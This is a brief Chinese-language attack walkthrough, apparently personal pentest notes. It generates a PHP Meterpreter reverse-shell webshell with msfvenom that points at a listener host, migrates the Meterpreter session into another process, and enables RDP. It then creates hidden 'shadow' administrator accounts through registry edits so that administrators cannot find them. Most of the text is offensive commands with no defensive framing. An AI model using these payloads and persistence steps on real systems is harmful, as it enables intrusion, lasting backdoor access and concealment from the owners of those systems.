先用msf生成php的webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.129.129 LPORT=4396 -f raw -o test.php
开启handler监听
然后就成功了
后渗透中权限维持影子账户创建
Msf生成个exe文件然后反向连接
然后权限维持
getpid # 获取当前进程的pid
ps # 查看当前活跃进程
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
然后开启3389远程连接直接远程登录
我们直接远程连接在本地直接创建影子账户
我们同样可以将这些账户进行隐藏,从而让管理员无法发现,达到影子账号的效果:
通过注册表的修改
